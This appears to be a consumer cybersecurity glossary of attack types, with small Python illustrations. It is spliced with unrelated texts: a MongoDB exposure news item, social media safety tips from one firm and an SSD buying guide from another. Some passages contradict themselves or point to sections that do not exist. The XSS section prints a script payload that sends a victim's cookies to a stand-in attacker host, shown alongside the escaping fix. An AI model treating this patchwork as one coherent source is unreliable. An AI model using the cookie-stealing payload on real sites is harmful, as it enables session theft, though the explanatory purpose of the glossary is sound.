Blended threats are attacks that combine two or more malware in order to maximize their efficiency. Blended threats combine Internet worms with viruses, keyloggers, ransomware, Trojans and any other type of malware in order to improve the spread and amount of damage inflicted.
Worms are malware designed to self-replicate and spread on the Internet using network connections without any human interference. Unlike a computer virus, worms don’t need a host program. They are standalone pieces of software. One of the most famous worms out there was developed way back in 2005 and targeted MySpace. Nicknamed the “Samy worm” after its creator, it managed to gather 1 million friend requests for Samy within a day.
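The self-replicating spread is easy to model. The following Python sketch is a toy simulation with made-up parameters: each infected host probes a few random peers per time step, and the infection snowballs with no human involved.

```python
import random

def simulate_worm(n_hosts=1000, contacts_per_step=5, steps=10, seed=42):
    """Toy model: every infected host probes random peers each step."""
    rng = random.Random(seed)
    infected = {0}                      # patient zero
    history = [len(infected)]
    for _ in range(steps):
        targets = set()
        for _ in infected:
            for _ in range(contacts_per_step):
                targets.add(rng.randrange(n_hosts))
        infected |= targets             # every probed peer becomes infected
        history.append(len(infected))
    return history

growth = simulate_worm()  # infection count per step, growing explosively
```

Real worms are constrained by which hosts are actually vulnerable and reachable, but the exponential early growth is why worms like Samy racked up a million victims in a day.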
Remote Access Trojan
Remote Access Trojans, or RATs for short, are Trojan malware that give an attacker administrative control over the infected computer. Once a RAT installs itself, the cybercriminal can control the PC remotely, allowing him to install keyloggers, deploy form-grabbing malware, activate the webcam, format drives, create a botnet and do pretty much anything else you can think of.
An exploit kit hides in a web page/server and looks for vulnerabilities in your PC. It does this by analyzing the traffic sent between your PC and the web page. After it finds a vulnerability, the exploit will launch a targeted attack against it, using either malware or any other exploit method. Particularly vulnerable applications are those that communicate with the Internet, such as Flash, Chrome, Firefox, Apple Quicktime and so on.
This is malicious software used to feed you ads and track your online behavior in order to improve how advertisers can target you. Oftentimes, adware comes attached to free programs such as music players or other comparable software.
Social engineering attacks
Social engineering attacks are those in which the cybercriminal actively makes contact with you, by pretending to be someone else, and manipulating you into revealing your data.
Short for “voice phishing”, this type of social engineering attack involves a scammer calling you either over the phone or through Internet voice apps such as Skype. The pretext varies, but in almost all cases, the scammer is after your money. He can pose as a bank clerk asking you to reconfirm your personal data, or as an employment agency asking you for an advance. In one of the more insidious cases of vishing we’ve heard of, the scammer might pretend to hold a loved one hostage, and claim to harm them if you won’t pay a ransom.
Phishing done over SMS/text messages. Like most phishing attacks, smishing targets your financial data, by pretending to come from a trusted source such as a bank. Passwords, credit card details, email accounts are all viable smishing targets.
Customer support scams
A popular scam that attackers use against tech users who aren’t familiar with more advanced technical concepts. The scammer will pose as a customer support representative and claim that your software or hardware has technical issues that need urgent fixing, otherwise you risk a catastrophic system failure. In exchange for the kind scammer’s expertise in fixing the issue, you have to pay a decent sum. Of course, there never was any issue, and your money is lost forever.
Possibly the most romantic type of scam out there. Catfishing involves creating a fake online persona in order to trick people on dating sites into parting with their money. The catfisher will stalk social media networks or dating sites, looking for emotionally vulnerable people seeking a relationship. The scammer seduces the victim, although the relationship is carried out only over the phone or text. The two never meet, since the scammer claims he is from out of state or abroad, on extended business trips or military tours. At some point, the scammer brings up an urgent problem that requires a sum of money to resolve. The reasons vary from story to story. Some might say they need money in order to obtain a visa to join the victim in their home country; in other cases, they claim they have a large amount of gold stuck in customs that requires a fee to allow passage into the country. Of course, the stories are all fake. The victim gets their heart broken, and also loses their money.
The (literally) dirtiest form of social engineering attacks. Dumpster diving involves digging through your actual trash in order to find valuable information about you, such as credit card data, social security numbers, phone numbers, email addresses, passwords (for people who actually write down theirs on paper). That’s why a shredder is good to have in any home.
These types of attacks often target cyber infrastructure such as databases, DNS servers and outdated software.
Malvertising is the practice of spreading malware through online ads. The attacker can either infect an already existing legitimate ad with malicious code, or he might put up his own infected one. Malvertising is very advantageous for a malicious hacker, since he doesn’t need to worry how to spread the malware. The ad network does all the hard work and exposes thousands or even millions of users to malware. On top of that, malvertising is difficult to detect, and can bypass firewalls and otherwise avoid various user safety measures.
Normally, Internet pages are identified by numbers, not words. These numbers are called IP addresses. To make them easier for humans to remember, these IP addresses are translated into letters and names. The translation from names to IP addresses takes place on Domain Name Servers, shortened as DNS, where the information is also stored. During DNS hijacking, an online attacker overrides your computer’s TCP/IP settings so that the DNS translation gets altered. For example, typing in “cnn.com” normally translates into CNN’s real IP address. A DNS hijacker, however, alters the translation so that “cnn.com” now sends you to the IP address of a different website.
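You can watch the translation step yourself from Python. This is the exact step a hijacker tampers with, so after a hijack the same name would quietly resolve to an attacker-controlled address instead:

```python
import socket

# Ask the operating system's resolver to translate a name into an address.
# "localhost" resolves locally, without a network query, which is why it
# reliably comes back as a loopback address such as 127.0.0.1.
ip = socket.gethostbyname("localhost")
```

A DNS hijacker (or a tampered hosts file) changes what this call returns for any name the attacker cares about, which is why the browser’s address bar alone can’t be trusted.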
During a URL injection, a malicious hacker infects a website by creating new pages on it. These pages in turn contain malicious links, spammy words or even malicious code that forces visitors on the page to be part of a DDoS attack or redirects them to a different website. A malicious hacker can perform a URL injection thanks to weaknesses in a site’s software, such as outdated WordPress plugins or flaws in other parts of its code.
Flooding describes the technique used in DDoS attacks, where an attacker sends a huge amount of information at a target, blocking it from processing any other information whatsoever. Depending on the attack vector they use, flooding attacks can be classified as follows:
- User Datagram Protocol (UDP) floods. UDP is in charge of sending so-called datagrams, meaning packets of information, between computers; the flood overwhelms the target with bogus datagrams.
- HTTP floods work by abusing the GET function of a website, which provides information to the browser, and the POST function, which creates content. The flood forces the web server to focus only on these functions, diverting processing power from all other aspects.
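A toy Python model shows why flooding works: once the server’s backlog fills with junk requests, legitimate ones get turned away. All the numbers here are arbitrary illustrations.

```python
import random
from collections import deque

def simulate_flood(capacity=100, legit=50, flood=5000, seed=1):
    """Toy model of a bounded request queue during a flood.

    Returns how many legitimate requests were dropped because the
    backlog was already full of flood traffic.
    """
    rng = random.Random(seed)
    traffic = ["legit"] * legit + ["flood"] * flood
    rng.shuffle(traffic)              # flood and real requests arrive mixed
    queue = deque()
    dropped_legit = 0
    for request in traffic:
        if len(queue) >= capacity:    # server backlog is full
            if request == "legit":
                dropped_legit += 1    # a real user is turned away
            continue
        queue.append(request)
    return dropped_legit

dropped = simulate_flood()  # most real users never get served
```

Defenses like rate limiting and traffic scrubbing work by keeping the junk out of that queue in the first place.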
Passive attacks look to acquire information about you, while limiting any other type of damage done to your system, so as to not raise any suspicion there might be something wrong with your PC.
Short for (Distributed) Denial of Service, these sorts of cyber attacks seek to disrupt the Internet use of a user or service by flooding its connection with useless information, such as enormous numbers of login attempts or excessive amounts of traffic. Unlike a DoS attack, a DDoS relies on a large number of devices that can simultaneously assault the target, hence the name “Distributed”, since the attacker’s resources are spread across many computers or other devices. Most DDoS attacks involve a botnet with a sufficient number of enslaved devices capable of launching a concerted attack; one famous example relied on millions of enslaved Internet of Things devices.
Web page defacing
As the name suggests, a malicious hacker or group will break into a website and change its visual appearance in order to send a message or warn the owner of the website. One of the more high-profile practitioners of web defacement is the Anonymous hacker group, which managed to break into the Islamic State’s website and replace it with Viagra ads.
Cyber sabotage mostly concerns companies, corporations and nation-states rather than individual users. In most cases, the attacker or hacker group targets a vital part of the victim’s Internet infrastructure. One prime target, for instance, is a country’s electrical power grid or data regarding military installations. Probably the most famous and devastating type of cyber warfare sabotage was the Stuxnet worm that targeted Iran’s nuclear program. This worm was specifically designed to target Siemens centrifuges used to enrich uranium in Iranian nuclear power plants. By modifying the rotation patterns, Stuxnet was able to destroy a significant amount of centrifuges, and delay Iran’s nuclear program by several years.
Snooping in on someone’s traffic is a technique malicious hackers use frequently in order to acquire data on their target. A prime target for sniffing is a wireless Internet router, or Wi-Fi. Particularly vulnerable Wi-Fi networks are those that use the older WEP or WPA encryption instead of the standard WPA2. Brute-force and dictionary attacks easily break the password for WEP/WPA encryption, and using dedicated sniffing software or a hardware tool, the malicious hacker can see the traffic going through the router, or he might redirect all the traffic to his own, cloned Wi-Fi. Sniffing the traffic sent over a Wi-Fi network gives the hacker a complete, real-time view of a user’s Internet activities. This exposes everything from passwords to email accounts and other similar types of information.
Advanced Persistent Threats, a.k.a. APTs
Sometimes, a malicious hacker group wants to do more than just a hit and run attack. A long-term infiltration in the IT system of a government, corporation or even a high-value individual can provide a lot more information and control. These types of infiltrations are called Advanced Persistent Threats and are carried out using rootkits, Trojans, Zero-Day exploits. To successfully penetrate high-value targets, such as government or financial infrastructure, the malicious hackers might even develop their own, specialized malware.
A technique used to obtain the details of a person’s credit/debit card by using a specialized card reader. In most cases, the card reader is placed over a legitimate bank ATM or similar devices, and stores the magnetized data for each and every card it scans. Afterwards, the scammer imprints the magnetized data over blank cards. By then, it’s just a matter of emptying the victim’s bank account using his own credit/debit card data.
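Incidentally, the card numbers a skimmer captures follow a public checksum, the Luhn algorithm, which both merchants and criminals use to weed out mistyped numbers. A short Python version of that standard check:

```python
def luhn_valid(number):
    """Check a card number string against the Luhn checksum."""
    digits = [int(d) for d in number if d.isdigit()]
    checksum = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:        # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9        # same as summing the two digits of the product
        checksum += d
    return checksum % 10 == 0

# The classic Visa test number passes; a one-digit typo fails.
assert luhn_valid("4111 1111 1111 1111")
assert not luhn_valid("4111 1111 1111 1112")
```

Note that Luhn only catches transcription errors; it provides zero security, which is why the skimmed magnetic-stripe data is the real prize.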
Man in the Middle attacks
Normally, Internet communication happens between two parties, meaning the sender and the receiver. During a Man-in-the-Middle attack, a malicious hacker places himself between your device and the website or app you’re communicating with. This gives him access to both your inbound traffic and your outbound traffic. In practice, this allows the malicious hacker to see everything you do on the Internet: passwords, browsing history, credit card details, email accounts. You name it.
An attack designed to harvest important data such as passwords, credit card data, emails and other such information. The attacker will first find a way to redirect traffic from a legitimate web page to a fake one he controls. If this fake web page contains any forms, then the victim will inadvertently hand over all of his private information. Pharming attacks target both individual users and DNS servers. When targeting users, malicious hackers send a phishing email that modifies the user’s local DNS settings (such as the hosts file) in order to redirect him from site A to site B. DNS attacks, or DNS poisoning as they are known, target the servers hosting a website’s DNS records. This allows a cybercriminal to redirect traffic from any website in the database to another website of his choosing.
By reusing information sites use to identify you, a malicious hacker can fool a website or service into giving them access to your account. For example, in order to log in to a website using Facebook, the social network will send a string of information to the site in question in order to confirm that it is really you who wants to log in. If a malicious hacker could somehow find and reuse that string of information, he could theoretically use it to trick the site into thinking he was actually you, thus obtaining access to your account on that website.
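This is why real services sign and expire their session tokens. Here is a simplified Python sketch using HMAC; the token layout and secret are hypothetical, but it shows how a captured token can be replayed inside its window and why it eventually stops working:

```python
import hashlib
import hmac
import time

SECRET = b"server-side-secret"  # hypothetical server-side signing key

def issue_token(user, ttl=3600, now=None):
    """Issue a signed session token that expires after `ttl` seconds."""
    expires = int((now or time.time()) + ttl)
    payload = "%s:%d" % (user, expires)
    sig = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return "%s:%s" % (payload, sig)

def verify_token(token, now=None):
    """Reject tokens that are forged, tampered with, or expired."""
    user, expires, sig = token.rsplit(":", 2)
    payload = "%s:%s" % (user, expires)
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False                                # forged or tampered
    return (now or time.time()) < int(expires)      # expired replays fail

token = issue_token("alice")
assert verify_token(token)                              # replay within window
assert not verify_token(token, now=time.time() + 7200)  # replay after expiry
```

Short expiry windows, one-time nonces, and binding tokens to a device or IP are the usual ways services shrink the replay window further.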
Remote access refers to any type of attack where the malicious hacker ends up taking control of your PC from a distance, using his own separate PC. Remote access attacks are made possible by rootkits and other types of malware that infected your PC in previous attacks and created a backdoor that allows the hacker to control your machine.
During a spoofing attack, the malicious hacker tries to disguise himself as another user or Internet device, in order to trick the victim into relaxing their defenses. Spoofing has multiple variations, depending on the identification method used: email, DNS or IP address spoofing. In email spoofing, the attacker forges the “From” section of the email to make it look like a genuine one you might receive from a boss or loved one. IP address spoofing creates a fake Internet Protocol address, which the attacker then uses to hide the identity of his computer or to impersonate someone else’s PC.
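Email spoofing works because the “From” header is just text the sender chooses; nothing in the message format itself verifies it (that job falls to server-side checks such as SPF, DKIM and DMARC). A Python illustration with made-up addresses:

```python
from email.message import EmailMessage

# Nothing stops a sender from writing any "From" value they like.
# Authentication, if any, happens when the receiving server checks
# SPF/DKIM/DMARC records for the claimed domain.
msg = EmailMessage()
msg["From"] = "ceo@victim-corp.example"      # forged sender
msg["To"] = "accounting@victim-corp.example"
msg["Subject"] = "Urgent wire transfer"
msg.set_content("Please process the attached invoice today.")
```

This is exactly why "the email says it's from the CEO" proves nothing on its own, and why CEO fraud (covered above) keeps working.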
Even the best software has its imperfections, and those are ruthlessly exploited by malicious hackers whenever possible. On a more fortunate note, software vulnerabilities are frequently patched by updates. For this reason, “update your software!!!11” is one of the most frequent types of cybersecurity advice, along with “use a strong password!!!11” and “don’t click on that!!!11”.
A buffer overflow takes place when a software or program tries to store more data than possible in a temporary storage space, known as a memory buffer. The excess data then spills over into other parts of the memory, overwriting the adjacent memory. A buffer overflow is frequently used to overwrite data in areas containing executable code. This replaces the existing code with a malicious one. If the attack is successful, the malicious hacker can then take complete control of the device.
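Python itself checks bounds, so a real overflow needs a language like C; the following Python snippet merely simulates the effect, with an unchecked copy spilling past an 8-byte buffer into the adjacent “return address” bytes:

```python
# Simulated memory: an 8-byte input buffer followed by 4 bytes that
# stand in for an adjacent "return address".
memory = bytearray(b"\x00" * 8) + bytearray(b"\xAA\xBB\xCC\xDD")

def unsafe_copy(mem, data):
    """Copies `data` with no bounds check, like C's strcpy."""
    for i, byte in enumerate(data):
        mem[i] = byte  # past index 7, this clobbers the adjacent bytes

unsafe_copy(memory, b"A" * 12)  # 12 bytes written into an 8-byte buffer
# The four "return address" bytes are now attacker-controlled "A"s.
```

In a real exploit, those overwritten bytes would point execution at attacker-supplied code, which is why bounds checking (and mitigations like stack canaries and ASLR) matter so much.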
A frequently used malicious hacking technique in which the attacker exploits a vulnerability in the software in order to inject code in the program. This program then executes the code, producing the attacker’s desired result, such as shutting down the device, taking control of it or any other type of malicious intent.
Cross site scripting (XSS)
Also known as an XSS attack, cross site scripting involves a blackhat hacker injecting malicious code into an otherwise trustworthy web page. Once a user performs a certain action (such as leaving a comment), the malicious code in the web page springs into action, infecting the user himself. A malicious hacker infects the web page by exploiting vulnerabilities in the page’s code or in any web plugins that happen to be installed.
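The standard defense is escaping user input before rendering it. Here is a minimal Python illustration using the standard library’s html.escape; the cookie-stealing URL is a made-up example of what injected script typically does:

```python
import html

user_comment = ('<script>document.location='
                '"http://evil.example/steal?c=" + document.cookie</script>')

# Rendered as-is, the browser would execute the script (stored XSS).
unsafe_page = "<p>%s</p>" % user_comment

# Escaped, the same input is displayed as inert text instead of running.
safe_page = "<p>%s</p>" % html.escape(user_comment)
```

Modern template engines escape by default for exactly this reason; XSS bugs usually come from code paths that bypass that escaping.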
Zero-Day exploits are nightmare scenarios, where an attacker discovers an unpatched vulnerability in a piece of software (that even its maker doesn’t know about) and then proceeds to exploit it to the fullest. In order for a user to avoid a Zero-Day attack, he has to either avoid using the vulnerable program or wait for the developer to release a software update. For example, malicious hackers used a Zero-Day vulnerability in the Sony Entertainment hack a few years back.
Instead of targeting websites and other types of infrastructure, browser hijackers go after individual users. By exploiting vulnerabilities in browsers, a malicious hacker can infect a user with adware, or redirect his traffic to a web page of his own choosing.
Time of check to time of use bugs
In order to do some particular things online, such as posting on Facebook, you need to go through a two-stage process. The first one is “time of check”. This means that Facebook must first verify whether you are able to perform said action. In most cases, verification means you must log into the social network. The second step is “time of use”, which, in our case, is the process of actually posting on Facebook. Time-of-check-to-time-of-use bugs allow a malicious hacker to somehow bypass “time of check” and go directly to “time of use”. Imagine the following scenario: your Facebook login information gets hacked, and a malicious hacker logs into your account and starts using it. You immediately find out about it and change both the email and password for your account. Even though you changed the “time of check” settings, the malicious hacker is still in the “time of use” phase, messing up your social media life by sending coworkers awkward photos of you in pajamas that you had originally sent to your loved one.
Privilege escalation
As a security feature, computers come with several built-in security layers, commonly referred to as “rings”:
1. The top ring houses applications such as games, Word, and Excel.
2. The middle rings control device drivers, such as graphics and sound cards.
3. The bottom ring, and also the deepest one, is the kernel, which controls the boot-up process and just about everything else in the PC.
Privilege escalation attacks allow a malicious hacker to exploit a flaw in a piece of software to gain access to other parts of the computer. For instance, he might find a vulnerability in the graphics driver that allows him to make his way up the access-rights chain and gain control of wider sections of the device.
Supply chain attacks
Companies rely on other companies to provide them with the resources they need to conduct business. This creates something called a supply chain, where each company provides a component of the end product. A cybercriminal can end up compromising the end product by hacking just one company in the supply chain. For instance, if a malicious hacker infects all the hard drives produced by a certain manufacturer with a rootkit, the attacker automatically infects every PC that has one of those drives built in.
Cybercriminals would love to get access to your accounts and passwords. Especially if they’re email accounts, which they can then use to take control of any other associated credentials. Here’s how a malicious hacker can break into your login credentials.
Brute force attacks
A password-guessing attack that involves trying a huge number of passwords on a login screen until the attacker finally finds the right one. A brute force attack can guess a weak password of eight or fewer characters in a few hours or days at most. Adding a few special characters and making the password 10 or more characters long dramatically increases the cracking time, to the point where it would take decades or even centuries to crack.
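The exponential blow-up behind that claim is easy to check with back-of-envelope arithmetic. The guessing rate below is an illustrative assumption (a plausible GPU cracking rig), not a figure from the article:

```python
def crack_time_seconds(alphabet_size, length, guesses_per_second):
    # Worst case: the attacker must try every combination in the keyspace.
    return alphabet_size ** length / guesses_per_second

RATE = 10_000_000_000  # 10 billion guesses/s (assumed GPU rig)

weak = crack_time_seconds(26, 8, RATE)     # 8 lowercase letters: 26^8
strong = crack_time_seconds(94, 10, RATE)  # 10 printable-ASCII chars: 94^10

print(f"8 lowercase chars: {weak:.0f} seconds")              # 21 seconds
print(f"10 mixed chars:    {strong / 31_536_000:.0f} years")  # 171 years
```

Going from 26^8 to 94^10 combinations turns seconds of cracking into lifetimes, which is exactly why length plus special characters matters.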
Dictionary attacks
Similar to a brute-force attack, except that this time the attacker configures his software around certain letters or words he suspects you might include in the password. For instance, if you are a pizza lover, he might instruct the software to first try password combinations that contain the word pizza, such as “pizzaislifeyeah” or “wick3dpizza”.
OAuth is the technology behind “Login with Facebook” and “Login with Google” buttons. In most cases, OAuth is a very secure login protocol, but many app developers do a poor job implementing it. Normally, when you press the “Login with Facebook” button, the app asks Facebook, “Is this guy legit?”, and the social network answers, “Yes he is, allow him to pass.” However, many apps want to shorten the time it takes for you to start using them, so they skip the part where Facebook confirms it’s really you and just log you in instantly. This allows a malicious hacker to manipulate the login process and gain access to your account.
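The skipped verification step can be sketched abstractly. The function names and the stub "provider" below are hypothetical illustrations, not a real Facebook or Google API:

```python
def login_insecure(token):
    # Buggy shortcut: trust whatever identity the client claims,
    # without asking the provider whether the token is genuine.
    return {"logged_in": True, "user": token.get("claimed_user")}

def login_secure(token, verify_with_provider):
    # Correct flow: the app asks the identity provider to confirm
    # the token before creating a session.
    user = verify_with_provider(token)
    if user is None:
        return {"logged_in": False, "user": None}
    return {"logged_in": True, "user": user}

# Stub provider that only accepts one known-good token.
def fake_provider(token):
    return "alice" if token.get("secret") == "good" else None

forged = {"claimed_user": "alice", "secret": "bad"}
print(login_insecure(forged))               # attacker gets in
print(login_secure(forged, fake_provider))  # attacker rejected
```

The vulnerable apps described above are effectively running `login_insecure`: they never round-trip the token back to the provider.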
Some malicious hackers aren’t interested in infecting you with malware. Instead, they want you to give them money willingly.
Spam
Email is big business. Even today, most marketers consider an email list to be the best money maker out there, more so than social media networks or raw internet traffic on their site. Some unethical marketers (sometimes known as blackhat marketers) bypass the process of building a legitimate email list by buying or renting one, and then blast the users with promotional emails they never signed up for. Spam also happens to be the top source of malware infections and phishing campaigns. It’s really easy for a spammer to target his emails at a certain country and find an email service to deliver them. Here’s a more in-depth look at how spam operations function and why they won’t go away any time soon.
Hate speech/cyber bullying
Some forms of abusive content center on spreading fear and stoking violence. Racist speech, homophobia, and religious fundamentalism are all forms of hate speech, since they incite readers to do what they otherwise wouldn’t do. Abusive content spreads through many channels: email, blogs, social media accounts, even advertising in some cases. Cyberbullying fits in the same category: the attacker seeks to humiliate the victim by blackmailing them or picking on their perceived flaws. Cyberbullying has a real impact on victims, with numerous stories of people driven to suicide.
Child pornography and other types of violent or sexually explicit content
One of the main reasons the dark web exists is to spread and sell content that is otherwise illegal. Child pornography is probably at the top of the list, alongside graphic videos depicting other violent acts.
Who are the people committing cyber attacks?
The vast majority of cybercriminal groups launch cyber attacks in order to make money. But there are other groups out there who aren’t interested in money-making.
State sponsored hacks
In the constant fight for geopolitical power, cyber attacks are a favorite tool in a nation’s arsenal. Hacking another country is a cleaner and quieter process than sending in tanks and soldiers, while still delivering tangible results. One of the highest-profile state-sponsored hacks is the Stuxnet worm we talked about earlier. Nobody has conclusively identified the source of the infection, but most analysts believe the United States and Israel created Stuxnet as a joint effort.
Hacktivists
Some hackers aren’t interested in money, nor do they work for governments. Instead, they seek to advance a social cause or mission, and are not ashamed to hack into governments or organizations they deem to be standing in the way. These causes vary from group to group. Most hacktivist groups claim to protect free speech, democracy, and transparency. One of the most well-known hacker groups out there is Anonymous, a loosely organized collective that has protested against tougher copyright laws, child pornography, and various corporations.
Cybercriminals
The biggest group of malicious hackers by far. Cybercriminals seek to make a quick buck by using any of the malicious methods mentioned above. Usually, a cybercriminal will specialize in a niche such as spam, phishing, or login attacks. Another thing to take into account is that malicious hackers don’t really operate as lone wolves. There is an entire so-called “malware economy,” where cybercriminals trade and sell hacking tools, leaked email databases, phone numbers, and even DDoS as a service.
The Internet has spurred a huge wave of innovation and has made all of our lives so much easier. Unfortunately, criminals have often innovated at the same speed, or even faster, coming up with newer and more powerful ways to take your hard-earned cash or control your information. Fortunately, there’s a lot you can do to avoid these attacks.
Attribution in the cybersecurity world refers to the process of tracking, identifying and placing blame on the hacker (perpetrator) or organization behind an attack. Following an attack, an organization should conduct an investigation to attribute the incident to specific threat actors to gain a detailed understanding of the attack, what the motivation behind the attack was, and possibly bring the hacker(s) to account.
Unfortunately, it is often difficult or impossible to track down the perpetrator of an attack, considering all of the avenues hackers can take to cover their tracks.
Additionally, increasingly sophisticated hackers are employing an approach known as “false flags” to hide their tracks. In this method of obfuscation, the hacker leaves behind evidence pointing to other nation states, hacker groups, or languages. This can be source code stolen from those other hacker groups, or small language snippets they have used previously in their malware code. The purpose of a false flag is to lead investigators to incorrect conclusions about the source of an attack or the hacking group behind it.
According to John Matherly, the creator of Shodan, nearly 595.2 terabytes of data were exposed through outdated or unpatched versions of the software. All of this data can be easily accessed without any authentication.
MongoDB is a popular NoSQL database and open-source alternative to SQL databases; many companies already use it, including The New York Times, eBay, and Foursquare. John Matherly argues that around 30,000 databases are exposed because administrators are running old versions of MongoDB, and these old versions fail to bind to localhost by default.
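On modern MongoDB versions, this class of exposure is avoided by binding the listener to localhost and requiring authentication. A minimal sketch of the relevant `mongod.conf` settings (the IP list must be adapted deliberately for any real deployment):

```yaml
# Minimal mongod.conf sketch: keep the database off the public internet.
net:
  port: 27017
  bindIp: 127.0.0.1        # listen on localhost only; add private IPs deliberately

security:
  authorization: enabled   # require users to authenticate before reading data
```

With `bindIp` restricted, a scanner like Shodan never sees the port; with `authorization` enabled, even an exposed instance refuses unauthenticated reads.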
This security issue was already known: security researcher Roman Shtylman reported it in 2012, flagging it as a critical bug because MongoDB was being shipped without authentication enabled by default.
This is not the first time the security industry has been concerned about the security of MongoDB: in February 2015, nearly 40,000 entities running MongoDB were found vulnerable to cyber attacks.
Do you find yourself checking social media more than ever to pass the time? You’re not alone. According to App Annie—the company setting the standard for mobile data and analytics—all social apps have reported increased engagement as users look for ways to stay connected with the outside world.
App Annie adds that people spent 20 percent more time in apps in Q1 of 2020 compared to last year, largely due to the COVID-19 lockdown. Experts foresee these numbers continuing to increase as governments across the world implement more stringent social distancing measures.
The app holding steady at the top of the downloads chart is TikTok, followed by WhatsApp Messenger, Facebook, and Instagram.
Unfortunately, with an increase in time spent online, there is a heightened risk of cybersecurity scams. Here are five quick tips you can implement in minutes to protect your personal information, specifically when using social media apps:
- Update your password often, and make sure it’s something STRONG. Create a password that includes numbers, uppercase and lowercase letters, and special characters. And be sure you’re not using the same password across multiple social media accounts. That just makes a hacker’s life easier! BARR recommends using a password manager, like LastPass, if you can.
- Review your privacy settings. Take a few minutes to explore how you can limit your audience, set updated security questions and answers, and just go over the who, what, where settings. The tighter your privacy controls are, the smaller the chance of having your personal information hacked.
- Use multi-factor authentication. This adds an extra barrier between you and hungry cybercriminals. Enabling this is easy, and all it means is that you’ll be sent a unique code via a secondary channel (text, email, etc.) to input when logging into your social media account.
- Be careful when clicking on links in your social media messaging apps. Often, cybercriminals create phishing scams where they send messages from someone you’d expect to get a message from. You click the link and, boom, they have your info. Confirm the person sending you the message or friend/follow request is who they say they are, and not a hacker who has recreated their account so it looks familiar to you.
- Log off when you’re done. Easy, but important, especially when accessing social media accounts on unfamiliar or shared devices.
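Tip 1 above can even be automated. A short sketch using Python's standard `secrets` module; the length and character set here are illustrative choices, not a recommendation from the article:

```python
import secrets
import string

SPECIALS = "!@#$%^&*"

def make_password(length=16):
    # Mix lowercase, uppercase, digits, and special characters, as the
    # tip recommends; secrets uses a cryptographically secure RNG,
    # unlike the random module.
    alphabet = string.ascii_letters + string.digits + SPECIALS
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(make_password())  # e.g. 'q7T!fZ2pX@c9RwLm' — different every run
```

A password manager remains the better option for most people, since it both generates and remembers strings like these.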
If you’re new to TikTok, this article shares the best settings for protecting your profile from hackers.
Questions about data protection or how your organization can strengthen its cybersecurity defense efforts? Contact us for a quick consultation.
Since their inception in the 1990s, solid-state drives (SSDs) have emerged as one of the 21st century’s top digital storage solutions. These drives are now vying with the older and more established hard disk drive (HDD) for market dominance and consumer preference.
HDDs and SSDs are similar because both are designed to provide storage for laptops, desktops, and other everyday tech gadgets. These drives are where we store personal and business documents, photos, videos, and all other digital files. But unlike HDDs that use mechanical parts to read and write data to platters, SSDs use flash memory to save information.
SSDs read and write data to interconnected flash-memory chips. These chips are unique because they can hold data, even when power isn’t flowing through them. The lack of mechanical components means that SSDs are pretty small, making them ideal for laptops and other devices. Naturally, as demand for portable tech has increased, so too has the need for SSDs.
In 2020, 320 million SSDs were shipped across the globe. This device’s market share has more than tripled between 2015 and 2020, and the industry expects shipments to increase by 13% in 2021. In 2020, for the first time, more SSDs were shipped than HDDs.
There’s a reason SSDs are overtaking HDDs. When you’re considering the pros and cons of SSD vs. HDD, you might assume the advantages of SSD outweigh the drawbacks. But that’s not necessarily true for everyone. This list of SSD pros and cons will help you determine if an SSD is the proper storage solution for you.
Benefits of SSD
There are several pros and cons of solid-state drives. But for most, the advantages of using an SSD make the drawbacks worth it. Here are three of the top benefits of an SSD.
Fast read and write speeds
SSDs read and write faster than HDDs. A typical SSD can read at about 550 megabytes per second (MBps) and write at 520 MBps under normal conditions. An HDD, on the other hand, can only read and write at about 125 MBps—more than four times slower than the SSD. Just looking at the numbers, you can see their performance is vastly different.
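Those throughput numbers translate directly into wait time. A quick sketch using the article's figures (the 100 GB file size is an illustrative assumption, and 1 GB is treated as 1000 MB):

```python
# Time to sequentially read a 100 GB file at the speeds quoted above.
FILE_GB = 100
ssd_seconds = FILE_GB * 1000 / 550  # ~550 MBps SSD read
hdd_seconds = FILE_GB * 1000 / 125  # ~125 MBps HDD read

print(f"SSD: {ssd_seconds:.0f} s")  # 182 s (about 3 minutes)
print(f"HDD: {hdd_seconds:.0f} s")  # 800 s (over 13 minutes)
```

A four-times throughput gap means four times the waiting on every large copy, backup, or game load.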
No moving parts
As we discussed before, HDDs use mechanical parts to physically read and write data to the disk. These moving parts cause most hard drive issues, which often result in data loss. SSDs have no mechanical components and, as a result, are far less likely to fail.
But the lack of moving parts has an added benefit: no noise. The sound of an HDD humming is a universally familiar noise. But since SSDs have no moving parts, they make no sound.
Smaller size
That absence of moving parts also means SSDs have a much smaller design than their HDD predecessors. HDDs have motors, spindles, and platters, all of which take up a lot of space. The chips that make up an SSD are thin and flat, and so are the drives built from them.
As devices needing storage get smaller, their hard drives need to as well. SSDs are slowly shrinking and, because of their composition, could continue to reduce in size.
Drawbacks of SSD
There’s much to consider before buying a hard drive, which is why understanding solid state drives pros and cons is so essential. And while there are many benefits of SSDs, there are SSD cons, as well.
Limited life span
Every SSD can absorb only a finite amount of data written to it over its lifetime. This limit is called terabytes written (TBW). When you buy an SSD, the device comes with a predetermined “time of death,” which arrives faster the more heavily you use the drive.
This may seem strange. But in actuality, these TBW limits are way more than the number of reads and writes performed by an average user. A recent study done by Google and the University of Toronto found that most SSDs fail due to age, not because they reached the TBW limit.
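A rough lifetime estimate shows why the TBW limit rarely matters in practice. The 600 TBW rating and the 50 GB/day workload below are illustrative assumptions, not figures from the article:

```python
TBW_RATING_TB = 600   # endurance rating of a typical 1 TB SSD (assumed)
DAILY_WRITES_GB = 50  # a fairly heavy desktop workload (assumed)

# Days of writing before the rating is exhausted, converted to years.
years = TBW_RATING_TB * 1000 / DAILY_WRITES_GB / 365
print(f"~{years:.0f} years of writes before hitting TBW")  # ~33 years
```

At that pace the drive's electronics and other components are likely to age out long before the flash wears out, consistent with the Google/University of Toronto finding.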
Higher cost
SSDs cost far more than their HDD counterparts. For comparable storage capacity, you’ll usually pay about double for an SSD. The high cost is an SSD con, but depending on how you plan to use the drive, the price might be an investment worth making.
Difficult data recovery
Despite the cons of SSD, you might conclude that SSD is superior to HDD. But this is a tough argument to make when it comes to data recovery. Recovering data from SSDs is far more complex than from HDDs. Attempting to fix an SSD while preserving data is no small feat and should never be attempted on your own. If you have a failing SSD and need help recovering your data, we can help. Contact DriveSavers to save the information on your SSD!
